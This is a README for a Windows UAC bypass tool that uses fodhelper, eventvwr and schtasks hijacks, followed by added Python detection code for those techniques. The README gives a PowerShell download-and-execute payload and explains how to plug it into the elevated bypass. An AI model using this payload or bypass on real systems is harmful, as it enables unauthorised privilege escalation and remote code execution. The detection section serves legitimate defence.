Should work from Windows 7 up to the latest Windows 10 FCU (also works if UAC is set to High/Always Notify).
Coded by Joel A. Ossi
For the PowerShell code in the UAC bypass you can use https://raikia.com/tool-powershell-encoder/
and payload: (new-object System.Net.WebClient).DownloadFile('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe', $env:TEMP + '\putty.exe');Start-Process($env:TEMP + '\putty.exe');
Replace YOURCODEHERE in the Python file with the encoded output.
You can set ENABLE_DOWNLOADER to 0 or 1, depending on whether you want it to Download & Execute or just open an elevated CMD.
Note: all exploits in the Python file need the current user to be in the Administrators group in order to take advantage of the vulnerability.
Please do not abuse this script, I uploaded this for Educational Purposes Only!
SPECIAL THANKS & EXPLOITS

Type: Shell API
Method: Registry key manipulation
Target(s): \system32\fodhelper.exe
Thanks to: winscripting.blog

Type: Shell API
Method: Environment variables expansion
Target(s): \system32\svchost.exe via \system32\schtasks.exe
Thanks to: James Forshaw

Type: Shell API
Method: Registry key manipulation
Target(s): \system32\EventVwr.exe
Thanks to: Enigma0x3
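
A defender-side check for the behaviour this README describes, as an added example that is not part of the original tool: it flags unexpected child processes of fodhelper.exe and eventvwr.exe and decodes PowerShell -EncodedCommand arguments to spot a downloader. The event dictionaries (Sysmon Event ID 1 field names), the URL and the function names are constructed for illustration; the schtasks/svchost entry is not covered.

```python
import base64
import re
# Auto-elevating binaries listed above, mapped to the child processes they
# legitimately start (eventvwr.exe normally launches mmc.exe).
EXPECTED_CHILDREN = {
    r"\system32\fodhelper.exe": set(),
    r"\system32\eventvwr.exe": {"mmc.exe"},
}
ENC_FLAG = re.compile(r"\s[-/]e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOADER_MARKERS = ("downloadfile", "downloadstring", "start-process")

def decode_encoded_command(cmdline):
    """Return the script passed via -e/-enc/-EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else None
    except ValueError:  # not valid base64 / UTF-16LE, so not an encoded script
        return None

def triage(event):
    """Return findings for one process-creation event (Sysmon Event ID 1 fields)."""
    findings = []
    parent = event["ParentImage"].lower()
    child = event["Image"].lower().rsplit("\\", 1)[-1]
    for suffix, allowed in EXPECTED_CHILDREN.items():
        if parent.endswith(suffix) and child not in allowed:
            findings.append(f"unexpected child {child} of {suffix}")
    script = decode_encoded_command(event["CommandLine"])
    if script and any(marker in script.lower() for marker in DOWNLOADER_MARKERS):
        findings.append("encoded PowerShell downloader: " + script)
    return findings

def encode_sample(script):  # builds the constructed sample below
    return base64.b64encode(script.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [  # constructed events, not captured from a real host
    {"ParentImage": r"C:\Windows\System32\fodhelper.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -enc " + encode_sample(
         "(new-object System.Net.WebClient).DownloadFile('http://example.invalid/a.exe', 'a.exe')")},
    {"ParentImage": r"C:\Windows\System32\eventvwr.exe",
     "Image": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r'"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"'},
    {"ParentImage": r"C:\Windows\System32\eventvwr.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["Image"], "->", triage(ev) or "ok")
```

The parent/child rule keys only on process lineage, so it still fires when the command line itself is not encoded.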